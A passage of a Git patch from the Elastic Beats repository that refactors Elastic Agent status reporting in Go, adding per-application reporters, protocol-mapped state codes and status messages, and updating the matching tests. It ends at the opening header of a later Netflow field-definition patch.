srv.Stop() diff --git a/x-pack/elastic-agent/pkg/capabilities/capabilities.go b/x-pack/elastic-agent/pkg/capabilities/capabilities.go index 498e09ac1012..b03bef73d8c8 100644 --- a/x-pack/elastic-agent/pkg/capabilities/capabilities.go +++ b/x-pack/elastic-agent/pkg/capabilities/capabilities.go @@ -8,6 +8,8 @@ import ( "errors" "os" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" + "gopkg.in/yaml.v2" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" @@ -44,7 +46,7 @@ func Load(capsFile string, log *logger.Logger, sc status.Controller) (Capability cm := &capabilitiesManager{ caps: make([]Capability, 0), - reporter: sc.RegisterWithPersistance("capabilities", true), + reporter: sc.RegisterComponentWithPersistance("capabilities", true), } // load capabilities from file @@ -85,7 +87,7 @@ func Load(capsFile string, log *logger.Logger, sc status.Controller) (Capability func (mgr *capabilitiesManager) Apply(in interface{}) (interface{}, error) { var err error // reset health on start, child caps will update to fail if needed - mgr.reporter.Update(status.Healthy) + mgr.reporter.Update(state.Healthy, "") for _, cap := range mgr.caps { in, err = cap.Apply(in) if err != nil { diff --git a/x-pack/elastic-agent/pkg/capabilities/capabilities_test.go b/x-pack/elastic-agent/pkg/capabilities/capabilities_test.go index d59b7c629392..46107463151c 100644 --- a/x-pack/elastic-agent/pkg/capabilities/capabilities_test.go +++ b/x-pack/elastic-agent/pkg/capabilities/capabilities_test.go @@ -135,7 +135,7 @@ func TestCapabilityManager(t *testing.T) { caps: []Capability{ filterKeywordCap{keyWord: "filter"}, }, - reporter: status.NewController(l).Register("test"), + reporter: status.NewController(l).RegisterComponent("test"), } newIn, err := mgr.Apply(m) @@ -160,7 +160,7 @@ func TestCapabilityManager(t *testing.T) { filterKeywordCap{keyWord: "filter"}, blockCap{}, }, - reporter: status.NewController(l).Register("test"), + reporter: status.NewController(l).RegisterComponent("test"), } newIn, err := mgr.Apply(m) @@ -185,7 +185,7 @@ func TestCapabilityManager(t *testing.T) { filterKeywordCap{keyWord: "filter"}, blockCap{}, }, - reporter: status.NewController(l).Register("test"), + reporter: status.NewController(l).RegisterComponent("test"), } newIn, err := mgr.Apply(m) @@ -210,7 +210,7 @@ func TestCapabilityManager(t *testing.T) { filterKeywordCap{keyWord: "filter"}, keepAsIsCap{}, }, - reporter: status.NewController(l).Register("test"), + reporter: status.NewController(l).RegisterComponent("test"), } newIn, err := mgr.Apply(m) @@ -235,7 +235,7 @@ func TestCapabilityManager(t *testing.T) { filterKeywordCap{keyWord: "filter"}, keepAsIsCap{}, }, - reporter: status.NewController(l).Register("test"), + reporter: status.NewController(l).RegisterComponent("test"), } newIn, err := mgr.Apply(m) @@ -260,7 +260,7 @@ func TestCapabilityManager(t *testing.T) { filterKeywordCap{keyWord: "filter"}, filterKeywordCap{keyWord: "key"}, }, - reporter: status.NewController(l).Register("test"), + reporter: status.NewController(l).RegisterComponent("test"), } newIn, err := mgr.Apply(m) @@ -283,7 +283,7 @@ func TestCapabilityManager(t *testing.T) { filterKeywordCap{keyWord: "key"}, filterKeywordCap{keyWord: "filter"}, }, - reporter: status.NewController(l).Register("test"), + reporter: status.NewController(l).RegisterComponent("test"), } newIn, err := mgr.Apply(m) diff --git a/x-pack/elastic-agent/pkg/capabilities/input.go b/x-pack/elastic-agent/pkg/capabilities/input.go index 7ddc1a224966..6515bd5b7152 100644 --- a/x-pack/elastic-agent/pkg/capabilities/input.go +++ b/x-pack/elastic-agent/pkg/capabilities/input.go @@ -7,6 +7,8 @@ package capabilities import ( "fmt" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" @@ -150,8 +152,9 @@ func (c *inputCapability) renderInputs(inputs []map[string]interface{}) ([]map[s input[conditionKey] = isSupported if !isSupported { - c.log.Errorf("input '%s' is left out due to capability restriction '%s'", inputType, c.name()) - c.reporter.Update(status.Degraded) + msg := fmt.Sprintf("input '%s' is left out due to capability restriction '%s'", inputType, c.name()) + c.log.Errorf(msg) + c.reporter.Update(state.Degraded, msg) } newInputs = append(newInputs, input) diff --git a/x-pack/elastic-agent/pkg/capabilities/input_test.go b/x-pack/elastic-agent/pkg/capabilities/input_test.go index 8416a81649bb..7a2707d8f83e 100644 --- a/x-pack/elastic-agent/pkg/capabilities/input_test.go +++ b/x-pack/elastic-agent/pkg/capabilities/input_test.go @@ -8,11 +8,12 @@ import ( "fmt" "testing" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" + "github.com/stretchr/testify/assert" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" ) @@ -394,5 +395,5 @@ func getInputsMap(tt ...string) map[string]interface{} { type testReporter struct{} -func (*testReporter) Update(status.AgentStatus) {} -func (*testReporter) Unregister() {} +func (*testReporter) Update(state.Status, string) {} +func (*testReporter) Unregister() {} diff --git a/x-pack/elastic-agent/pkg/capabilities/output.go b/x-pack/elastic-agent/pkg/capabilities/output.go index 34a9ca6e0553..bf47123f3379 100644 --- a/x-pack/elastic-agent/pkg/capabilities/output.go +++ b/x-pack/elastic-agent/pkg/capabilities/output.go @@ -7,6 +7,8 @@ package capabilities import ( "fmt" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" @@ -129,8 +131,9 @@ func (c *outputCapability) renderOutputs(outputs map[string]interface{}) (map[st outputs[outputName] = output if !isSupported { - c.log.Errorf("output '%s' is left out due to capability restriction '%s'", outputName, c.name()) - c.reporter.Update(status.Degraded) + msg := fmt.Sprintf("output '%s' is left out due to capability restriction '%s'", outputName, c.name()) + c.log.Errorf(msg) + c.reporter.Update(state.Degraded, msg) } } diff --git a/x-pack/elastic-agent/pkg/capabilities/upgrade.go b/x-pack/elastic-agent/pkg/capabilities/upgrade.go index 4ca6f9074d4b..8712529c841a 100644 --- a/x-pack/elastic-agent/pkg/capabilities/upgrade.go +++ b/x-pack/elastic-agent/pkg/capabilities/upgrade.go @@ -8,6 +8,8 @@ import ( "fmt" "strings" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" @@ -125,8 +127,9 @@ func (c *upgradeCapability) Apply(upgradeMap map[string]interface{}) (map[string // if deny switch the logic if c.Type == denyKey { isSupported = !isSupported - c.log.Errorf("upgrade is blocked out due to capability restriction '%s'", c.name()) - c.reporter.Update(status.Degraded) + msg := fmt.Sprintf("upgrade is blocked out due to capability restriction '%s'", c.name()) + c.log.Errorf(msg) + c.reporter.Update(state.Degraded, msg) } if !isSupported { diff --git a/x-pack/elastic-agent/pkg/core/logger/logger.go b/x-pack/elastic-agent/pkg/core/logger/logger.go index 9ae4c78834af..3e70cd88e57b 100644 --- a/x-pack/elastic-agent/pkg/core/logger/logger.go +++ b/x-pack/elastic-agent/pkg/core/logger/logger.go @@ -43,7 +43,7 @@ func NewWithLogpLevel(name string, level logp.Level) (*Logger, error) { return new(name, defaultCfg) } -//NewFromConfig takes the user configuration and generate the right logger. +// NewFromConfig takes the user configuration and generate the right logger. // TODO: Finish implementation, need support on the library that we use. func NewFromConfig(name string, cfg *Config) (*Logger, error) { return new(name, cfg) diff --git a/x-pack/elastic-agent/pkg/core/plugin/process/app.go b/x-pack/elastic-agent/pkg/core/plugin/process/app.go index 1de2feb559fc..4586505db8d3 100644 --- a/x-pack/elastic-agent/pkg/core/plugin/process/app.go +++ b/x-pack/elastic-agent/pkg/core/plugin/process/app.go @@ -85,21 +85,24 @@ func NewApplication( b, _ := tokenbucket.NewTokenBucket(ctx, 3, 3, 1*time.Second) return &Application{ - bgContext: ctx, - id: id, - name: appName, - pipelineID: pipelineID, - logLevel: logLevel, - desc: desc, - srv: srv, - processConfig: cfg.ProcessConfig, - logger: logger, - limiter: b, + bgContext: ctx, + id: id, + name: appName, + pipelineID: pipelineID, + logLevel: logLevel, + desc: desc, + srv: srv, + processConfig: cfg.ProcessConfig, + logger: logger, + limiter: b, + state: state.State{ + Status: state.Stopped, + }, reporter: reporter, monitor: monitor, uid: uid, gid: gid, - statusReporter: statusController.Register(id), + statusReporter: statusController.RegisterApp(id, appName), }, nil } @@ -231,25 +234,6 @@ func (a *Application) waitProc(proc *os.Process) <-chan *os.ProcessState { return resChan } -func (a *Application) setStateFromProto(pstatus proto.StateObserved_Status, msg string, payload map[string]interface{}) { - var status state.Status - switch pstatus { - case proto.StateObserved_STARTING: - status = state.Starting - case proto.StateObserved_CONFIGURING: - status = state.Configuring - case proto.StateObserved_HEALTHY: - status = state.Running - case proto.StateObserved_DEGRADED: - status = state.Degraded - case proto.StateObserved_FAILED: - status = state.Failed - case proto.StateObserved_STOPPING: - status = state.Stopping - } - a.setState(status, msg, payload) -} - func (a *Application) setState(s state.Status, msg string, payload map[string]interface{}) { if a.state.Status != s || a.state.Message != msg || !reflect.DeepEqual(a.state.Payload, payload) { a.state.Status = s @@ -258,15 +242,7 @@ func (a *Application) setState(s state.Status, msg string, payload map[string]in if a.reporter != nil { go a.reporter.OnStateChange(a.id, a.name, a.state) } - - switch s { - case state.Configuring, state.Restarting, state.Starting, state.Stopping, state.Updating: - // no action - case state.Crashed, state.Failed, state.Degraded: - a.statusReporter.Update(status.Degraded) - default: - a.statusReporter.Update(status.Healthy) - } + a.statusReporter.Update(s, msg) } } diff --git a/x-pack/elastic-agent/pkg/core/plugin/process/configure.go b/x-pack/elastic-agent/pkg/core/plugin/process/configure.go index fca2ea0f9c1e..23ebdafbf60d 100644 --- a/x-pack/elastic-agent/pkg/core/plugin/process/configure.go +++ b/x-pack/elastic-agent/pkg/core/plugin/process/configure.go @@ -11,7 +11,6 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" ) // Configure configures the application with the passed configuration. @@ -20,9 +19,7 @@ func (a *Application) Configure(_ context.Context, config map[string]interface{} if err != nil { // inject App metadata err = errors.New(err, errors.M(errors.MetaKeyAppName, a.name), errors.M(errors.MetaKeyAppName, a.id)) - a.statusReporter.Update(status.Degraded) - } else { - a.statusReporter.Update(status.Healthy) + a.statusReporter.Update(state.Degraded, err.Error()) } }() diff --git a/x-pack/elastic-agent/pkg/core/plugin/process/status.go b/x-pack/elastic-agent/pkg/core/plugin/process/status.go index 473ae9a70c77..21ded6671016 100644 --- a/x-pack/elastic-agent/pkg/core/plugin/process/status.go +++ b/x-pack/elastic-agent/pkg/core/plugin/process/status.go @@ -28,7 +28,7 @@ func (a *Application) OnStatusChange(s *server.ApplicationState, status proto.St return } - a.setStateFromProto(status, msg, payload) + a.setState(state.FromProto(status), msg, payload) if status == proto.StateObserved_FAILED { // ignore when expected state is stopping if s.Expected() == proto.StateExpected_STOPPING { diff --git a/x-pack/elastic-agent/pkg/core/plugin/service/app.go b/x-pack/elastic-agent/pkg/core/plugin/service/app.go index 8e336338f8fd..97196e0307fe 100644 --- a/x-pack/elastic-agent/pkg/core/plugin/service/app.go +++ b/x-pack/elastic-agent/pkg/core/plugin/service/app.go @@ -90,22 +90,25 @@ func NewApplication( b, _ := tokenbucket.NewTokenBucket(ctx, 3, 3, 1*time.Second) return &Application{ - bgContext: ctx, - id: id, - name: appName, - pipelineID: pipelineID, - logLevel: logLevel, - desc: desc, - srv: srv, - processConfig: cfg.ProcessConfig, - logger: logger, - limiter: b, + bgContext: ctx, + id: id, + name: appName, + pipelineID: pipelineID, + logLevel: logLevel, + desc: desc, + srv: srv, + processConfig: cfg.ProcessConfig, + logger: logger, + limiter: b, + state: state.State{ + Status: state.Stopped, + }, reporter: reporter, monitor: monitor, uid: uid, gid: gid, credsPort: credsPort, - statusReporter: statusController.Register(id), + statusReporter: statusController.RegisterApp(id, appName), }, nil } @@ -207,9 +210,7 @@ func (a *Application) Configure(_ context.Context, config map[string]interface{} if err != nil { // inject App metadata err = errors.New(err, errors.M(errors.MetaKeyAppName, a.name), errors.M(errors.MetaKeyAppName, a.id)) - a.statusReporter.Update(status.Degraded) - } else { - a.statusReporter.Update(status.Healthy) + a.statusReporter.Update(state.Degraded, err.Error()) } }() @@ -287,26 +288,7 @@ func (a *Application) OnStatusChange(s *server.ApplicationState, status proto.St return } - a.setStateFromProto(status, msg, payload) -} - -func (a *Application) setStateFromProto(pstatus proto.StateObserved_Status, msg string, payload map[string]interface{}) { - var status state.Status - switch pstatus { - case proto.StateObserved_STARTING: - status = state.Starting - case proto.StateObserved_CONFIGURING: - status = state.Configuring - case proto.StateObserved_HEALTHY: - status = state.Running - case proto.StateObserved_DEGRADED: - status = state.Degraded - case proto.StateObserved_FAILED: - status = state.Failed - case proto.StateObserved_STOPPING: - status = state.Stopping - } - a.setState(status, msg, payload) + a.setState(state.FromProto(status), msg, payload) } func (a *Application) setState(s state.Status, msg string, payload map[string]interface{}) { @@ -317,15 +299,7 @@ func (a *Application) setState(s state.Status, msg string, payload map[string]in if a.reporter != nil { go a.reporter.OnStateChange(a.id, a.name, a.state) } - - switch s { - case state.Configuring, state.Restarting, state.Starting, state.Stopping, state.Updating: - // no action - case state.Crashed, state.Failed, state.Degraded: - a.statusReporter.Update(status.Degraded) - default: - a.statusReporter.Update(status.Healthy) - } + a.statusReporter.Update(s, msg) } } diff --git a/x-pack/elastic-agent/pkg/core/state/state.go b/x-pack/elastic-agent/pkg/core/state/state.go index 670cdc2a2f23..98319ad33150 100644 --- a/x-pack/elastic-agent/pkg/core/state/state.go +++ b/x-pack/elastic-agent/pkg/core/state/state.go @@ -5,6 +5,8 @@ package state import ( + "github.com/elastic/elastic-agent-client/v7/pkg/proto" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/process" ) @@ -13,27 +15,57 @@ type Status int const ( // Stopped is status describing not running application. - Stopped Status = iota + Stopped Status = -4 + // Crashed is status describing application is crashed. + Crashed Status = -3 + // Restarting is status describing application is restarting. + Restarting Status = -2 + // Updating is status describing application is updating. + Updating Status = -1 + // Starting is status describing application is starting. - Starting + Starting = Status(proto.StateObserved_STARTING) // Configuring is status describing application is configuring. - Configuring - // Running is status describing application is running. - Running + Configuring = Status(proto.StateObserved_CONFIGURING) + // Healthy is status describing application is running. + Healthy = Status(proto.StateObserved_HEALTHY) // Degraded is status describing application is degraded. - Degraded + Degraded = Status(proto.StateObserved_DEGRADED) // Failed is status describing application is failed. - Failed + Failed = Status(proto.StateObserved_FAILED) // Stopping is status describing application is stopping. - Stopping - // Crashed is status describing application is crashed. - Crashed - // Restarting is status describing application is restarting. - Restarting - // Updating is status describing application is updating. - Updating + Stopping = Status(proto.StateObserved_STOPPING) ) +// IsInternal returns true if the status is an internal status and not something that should be reported +// over the protocol as an actual status. +func (s Status) IsInternal() bool { + return s < Starting +} + +// ToProto converts the status to status that is compatible with the protocol. +func (s Status) ToProto() proto.StateObserved_Status { + if !s.IsInternal() { + return proto.StateObserved_Status(s) + } + if s == Updating || s == Restarting { + return proto.StateObserved_STARTING + } + if s == Crashed { + return proto.StateObserved_FAILED + } + if s == Stopped { + return proto.StateObserved_STOPPING + } + // fallback to degraded + return proto.StateObserved_DEGRADED +} + +// FromProto converts the status from protocol to status Agent representation. +func FromProto(s proto.StateObserved_Status) Status { + return Status(s) +} + // State wraps the process state and application status. type State struct { ProcessInfo *process.Info diff --git a/x-pack/elastic-agent/pkg/core/status/reporter.go b/x-pack/elastic-agent/pkg/core/status/reporter.go index 2d3517a434f3..d4abd96a990f 100644 --- a/x-pack/elastic-agent/pkg/core/status/reporter.go +++ b/x-pack/elastic-agent/pkg/core/status/reporter.go @@ -9,55 +9,71 @@ import ( "github.com/google/uuid" + "github.com/elastic/elastic-agent-client/v7/pkg/proto" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" ) -// AgentStatus represents a status of agent. -type AgentStatus int - -// UpdateFunc is used by components to notify reporter about status changes. -type UpdateFunc func(AgentStatus) +// AgentStatusCode is the status code for the Elastic Agent overall. +type AgentStatusCode int const ( // Healthy status means everything is fine. - Healthy AgentStatus = iota + Healthy AgentStatusCode = iota // Degraded status means something minor is preventing agent to work properly. Degraded // Failed status means agent is unable to work properly. Failed ) -var ( - humanReadableStatuses = map[AgentStatus]string{ - Healthy: "online", - Degraded: "degraded", - Failed: "error", - } -) +// String returns the string value for the agent code. +func (s AgentStatusCode) String() string { + return []string{"online", "degraded", "error"}[s] +} + +// AgentApplicationStatus returns the status of specific application. +type AgentApplicationStatus struct { + ID string + Name string + Status state.Status + Message string +} + +// AgentStatus returns the overall status of the Elastic Agent. +type AgentStatus struct { + Status AgentStatusCode + Message string + Applications []AgentApplicationStatus +} // Controller takes track of component statuses. type Controller interface { - Register(string) Reporter - RegisterWithPersistance(string, bool) Reporter + RegisterComponent(string) Reporter + RegisterComponentWithPersistance(string, bool) Reporter + RegisterApp(id string, name string) Reporter Status() AgentStatus + StatusCode() AgentStatusCode StatusString() string UpdateStateID(string) } type controller struct { - lock sync.Mutex - status AgentStatus - reporters map[string]*reporter - log *logger.Logger - stateID string + mx sync.Mutex + status AgentStatusCode + reporters map[string]*reporter + appReporters map[string]*reporter + log *logger.Logger + stateID string } // NewController creates a new reporter. func NewController(log *logger.Logger) Controller { return &controller{ - status: Healthy, - reporters: make(map[string]*reporter), - log: log, + status: Healthy, + reporters: make(map[string]*reporter), + appReporters: make(map[string]*reporter), + log: log, } } @@ -68,82 +84,145 @@ func (r *controller) UpdateStateID(stateID string) { return } - r.lock.Lock() + r.mx.Lock() r.stateID = stateID - // cleanup status + // cleanup status for component reporters + // the status of app reports remain the same for _, rep := range r.reporters { if !rep.isRegistered { continue } - rep.lock.Lock() + rep.mx.Lock() if !rep.isPersistent { - rep.status = Healthy + rep.status = state.Configuring + rep.message = "" } - rep.lock.Unlock() + rep.mx.Unlock() } - r.lock.Unlock() + r.mx.Unlock() r.updateStatus() } // Register registers new component for status updates. -func (r *controller) Register(componentIdentifier string) Reporter { - return r.RegisterWithPersistance(componentIdentifier, false) +func (r *controller) RegisterComponent(componentIdentifier string) Reporter { + return r.RegisterComponentWithPersistance(componentIdentifier, false) } -func (r *controller) RegisterWithPersistance(componentIdentifier string, persistent bool) Reporter { +// Register registers new component for status updates. +func (r *controller) RegisterComponentWithPersistance(componentIdentifier string, persistent bool) Reporter { id := componentIdentifier + "-" + uuid.New().String()[:8] rep := &reporter{ + name: componentIdentifier, isRegistered: true, unregisterFunc: func() { - r.lock.Lock() + r.mx.Lock() delete(r.reporters, id) - r.lock.Unlock() + r.mx.Unlock() }, notifyChangeFunc: r.updateStatus, isPersistent: persistent, } - r.lock.Lock() + r.mx.Lock() r.reporters[id] = rep - r.lock.Unlock() + r.mx.Unlock() + + return rep +} + +// RegisterApp registers new component for status updates. +func (r *controller) RegisterApp(componentIdentifier string, name string) Reporter { + id := componentIdentifier + "-" + uuid.New().String()[:8] + rep := &reporter{ + name: name, + status: state.Stopped, + isRegistered: true, + unregisterFunc: func() { + r.mx.Lock() + delete(r.appReporters, id) + r.mx.Unlock() + }, + notifyChangeFunc: r.updateStatus, + } + + r.mx.Lock() + r.appReporters[id] = rep + r.mx.Unlock() return rep } // Status retrieves current agent status. func (r *controller) Status() AgentStatus { + r.mx.Lock() + defer r.mx.Unlock() + apps := make([]AgentApplicationStatus, 0, len(r.appReporters)) + for key, rep := range r.appReporters { + rep.mx.Lock() + apps = append(apps, AgentApplicationStatus{ + ID: key, + Name: rep.name, + Status: rep.status, + Message: rep.message, + }) + rep.mx.Unlock() + } + return AgentStatus{ + Status: r.status, + Message: "", + Applications: apps, + } +} + +// StatusCode retrieves current agent status code. +func (r *controller) StatusCode() AgentStatusCode { + r.mx.Lock() + defer r.mx.Unlock() return r.status } func (r *controller) updateStatus() { status := Healthy - r.lock.Lock() + r.mx.Lock() for id, rep := range r.reporters { - s := rep.status + s := statusToAgentStatus(rep.status) if s > status { status = s } - r.log.Debugf("'%s' has status '%s'", id, humanReadableStatuses[s]) + r.log.Debugf("'%s' has status '%s'", id, s) if status == Failed { break } } + if status != Failed { + for id, rep := range r.appReporters { + s := statusToAgentStatus(rep.status) + if s > status { + status = s + } + + r.log.Debugf("'%s' has status '%s'", id, s) + if status == Failed { + break + } + } + } if r.status != status { r.logStatus(status) r.status = status } - r.lock.Unlock() + r.mx.Unlock() } -func (r *controller) logStatus(status AgentStatus) { +func (r *controller) logStatus(status AgentStatusCode) { logFn := r.log.Infof if status == Degraded { logFn = r.log.Warnf @@ -151,37 +230,40 @@ func (r *controller) logStatus(status AgentStatus) { logFn = r.log.Errorf } - logFn("Elastic Agent status changed to: '%s'", humanReadableStatuses[status]) + logFn("Elastic Agent status changed to: '%s'", status) } // StatusString retrieves human readable string of current agent status. func (r *controller) StatusString() string { - return humanReadableStatuses[r.Status()] + return r.StatusCode().String() } // Reporter reports status of component type Reporter interface { - Update(AgentStatus) + Update(state.Status, string) Unregister() } type reporter struct { - lock sync.Mutex + name string + mx sync.Mutex isPersistent bool isRegistered bool - status AgentStatus + status state.Status + message string unregisterFunc func() notifyChangeFunc func() } // Update updates the status of a component. -func (r *reporter) Update(s AgentStatus) { - r.lock.Lock() - defer r.lock.Unlock() +func (r *reporter) Update(s state.Status, message string) { + r.mx.Lock() + defer r.mx.Unlock() if !r.isRegistered { return } + r.message = message if r.status != s { r.status = s r.notifyChangeFunc() @@ -191,10 +273,21 @@ func (r *reporter) Update(s AgentStatus) { // Unregister unregister status from reporter. Reporter will no longer be taken into consideration // for overall status computation. func (r *reporter) Unregister() { - r.lock.Lock() - defer r.lock.Unlock() + r.mx.Lock() + defer r.mx.Unlock() r.isRegistered = false r.unregisterFunc() r.notifyChangeFunc() } + +func statusToAgentStatus(status state.Status) AgentStatusCode { + s := status.ToProto() + if s == proto.StateObserved_DEGRADED { + return Degraded + } + if s == proto.StateObserved_FAILED { + return Failed + } + return Healthy +} diff --git a/x-pack/elastic-agent/pkg/core/status/reporter_test.go b/x-pack/elastic-agent/pkg/core/status/reporter_test.go index 5706f42c22a6..55fcd3e04fe4 100644 --- a/x-pack/elastic-agent/pkg/core/status/reporter_test.go +++ b/x-pack/elastic-agent/pkg/core/status/reporter_test.go @@ -10,85 +10,92 @@ import ( "github.com/stretchr/testify/assert" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" ) func TestReporter(t *testing.T) { l, _ := logger.New("") t.Run("healthy by default", func(t *testing.T) { r := NewController(l) - assert.Equal(t, Healthy, r.Status()) + assert.Equal(t, Healthy, r.StatusCode()) assert.Equal(t, "online", r.StatusString()) }) t.Run("healthy when all healthy", func(t *testing.T) { r := NewController(l) - r1 := r.Register("r1") - r2 := r.Register("r2") - r3 := r.Register("r3") - - r1.Update(Healthy) - r2.Update(Healthy) - r3.Update(Healthy) - - assert.Equal(t, Healthy, r.Status()) + r1 := r.RegisterComponent("r1") + r2 := r.RegisterComponent("r2") + r3 := r.RegisterComponent("r3") + a1 := r.RegisterApp("app-1", "app") + a2 := r.RegisterApp("app-2", "app") + a3 := r.RegisterApp("other-1", "other") + + r1.Update(state.Healthy, "") + r2.Update(state.Healthy, "") + r3.Update(state.Healthy, "") + a1.Update(state.Healthy, "") + a2.Update(state.Healthy, "") + a3.Update(state.Healthy, "") + + assert.Equal(t, Healthy, r.StatusCode()) assert.Equal(t, "online", r.StatusString()) }) t.Run("degraded when one degraded", func(t *testing.T) { r := NewController(l) - r1 := r.Register("r1") - r2 := r.Register("r2") - r3 := r.Register("r3") + r1 := r.RegisterComponent("r1") + r2 := r.RegisterComponent("r2") + r3 := r.RegisterComponent("r3") - r1.Update(Healthy) - r2.Update(Degraded) - r3.Update(Healthy) + r1.Update(state.Healthy, "") + r2.Update(state.Degraded, "degraded") + r3.Update(state.Healthy, "") - assert.Equal(t, Degraded, r.Status()) + assert.Equal(t, Degraded, r.StatusCode()) assert.Equal(t, "degraded", r.StatusString()) }) t.Run("failed when one failed", func(t *testing.T) { r := NewController(l) - r1 := r.Register("r1") - r2 := r.Register("r2") - r3 := r.Register("r3") + r1 := r.RegisterComponent("r1") + r2 := r.RegisterComponent("r2") + r3 := r.RegisterComponent("r3") - r1.Update(Healthy) - r2.Update(Failed) - r3.Update(Healthy) + r1.Update(state.Healthy, "") + r2.Update(state.Failed, "failed") + r3.Update(state.Healthy, "") - assert.Equal(t, Failed, r.Status()) + assert.Equal(t, Failed, r.StatusCode()) assert.Equal(t, "error", r.StatusString()) }) t.Run("failed when one failed and one degraded", func(t *testing.T) { r := NewController(l) - r1 := r.Register("r1") - r2 := r.Register("r2") - r3 := r.Register("r3") + r1 := r.RegisterComponent("r1") + r2 := r.RegisterComponent("r2") + r3 := r.RegisterComponent("r3") - r1.Update(Healthy) - r2.Update(Failed) - r3.Update(Degraded) + r1.Update(state.Healthy, "") + r2.Update(state.Failed, "failed") + r3.Update(state.Degraded, "degraded") - assert.Equal(t, Failed, r.Status()) + assert.Equal(t, Failed, r.StatusCode()) assert.Equal(t, "error", r.StatusString()) }) t.Run("degraded when degraded and healthy, failed unregistered", func(t *testing.T) { r := NewController(l) - r1 := r.Register("r1") - r2 := r.Register("r2") - r3 := r.Register("r3") + r1 := r.RegisterComponent("r1") + r2 := r.RegisterComponent("r2") + r3 := r.RegisterComponent("r3") - r1.Update(Healthy) - r2.Update(Failed) - r3.Update(Degraded) + r1.Update(state.Healthy, "") + r2.Update(state.Failed, "failed") + r3.Update(state.Degraded, "degraded") r2.Unregister() - assert.Equal(t, Degraded, r.Status()) + assert.Equal(t, Degraded, r.StatusCode()) assert.Equal(t, "degraded", r.StatusString()) }) } diff --git a/x-pack/elastic-agent/pkg/reporter/reporter.go b/x-pack/elastic-agent/pkg/reporter/reporter.go index 3b128841b2a1..b1568e9f3f1e 100644 --- a/x-pack/elastic-agent/pkg/reporter/reporter.go +++ b/x-pack/elastic-agent/pkg/reporter/reporter.go @@ -108,7 +108,7 @@ func generateRecord(agentID string, id string, name string, s state.State) event case state.Configuring: subType = EventSubTypeConfig subTypeText = EventSubTypeConfig - case state.Running: + case state.Healthy: subType = EventSubTypeRunning subTypeText = EventSubTypeRunning case state.Degraded: diff --git a/x-pack/elastic-agent/pkg/reporter/reporter_test.go b/x-pack/elastic-agent/pkg/reporter/reporter_test.go index ace35f0550b4..8b0c095f654f 100644 --- a/x-pack/elastic-agent/pkg/reporter/reporter_test.go +++ b/x-pack/elastic-agent/pkg/reporter/reporter_test.go @@ -62,11 +62,11 @@ func TestTypes(t *testing.T) { EventMessage: "Application: a-configuring[id]: State changed to CONFIG: Configuring", }, { - Status: state.Running, - StatusMessage: "Running", + Status: state.Healthy, + StatusMessage: "Healthy", EventType: EventTypeState, EventSubType: EventSubTypeRunning, - EventMessage: "Application: a-running[id]: State changed to RUNNING: Running", + EventMessage: "Application: a-healthy[id]: State changed to RUNNING: Healthy", }, { Status: state.Degraded, diff --git a/x-pack/elastic-agent/spec/fleet-server.yml b/x-pack/elastic-agent/spec/fleet-server.yml index 1c444f8990e7..167bd9f83058 100644 --- a/x-pack/elastic-agent/spec/fleet-server.yml +++ b/x-pack/elastic-agent/spec/fleet-server.yml @@ -24,6 +24,10 @@ rules: selectors: [ fleet.server.output.elasticsearch ] path: output + - select_into: + selectors: [ fleet.server.policy.id ] + path: inputs.0.policy + - map: path: fleet rules: From b8ff64957d1821dfec0b692ffb0ae7cce22e81f3 Mon Sep 17 00:00:00 2001 From: Andrew Kroh Date: Tue, 16 Feb 2021 10:02:05 -0500 Subject: [PATCH 55/63] [Filebeat] Add field definitions for known Netflow/IPFIX vendor fields (#23773) * Add field definitions for known Netflow/IPFIX vendor fields * Add default_field: false to netflow * Refactor generator to merge all fields to remove duplicates * Remove indent flag from usage Closes #23771 --- CHANGELOG.next.asciidoc | 1 + filebeat/docs/fields.asciidoc | 7592 +++++++++++++++-- .../input/netflow/_meta/fields.header.yml | 1 + .../filebeat/input/netflow/_meta/fields.yml | 4060 +++++++-- .../input/netflow/decoder/fields/gen.go | 5 + x-pack/filebeat/input/netflow/doc.go | 3 +- x-pack/filebeat/input/netflow/fields.go | 2 +- x-pack/filebeat/input/netflow/fields_gen.go | 230 +- 8 files changed, 10349 insertions(+), 1545 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 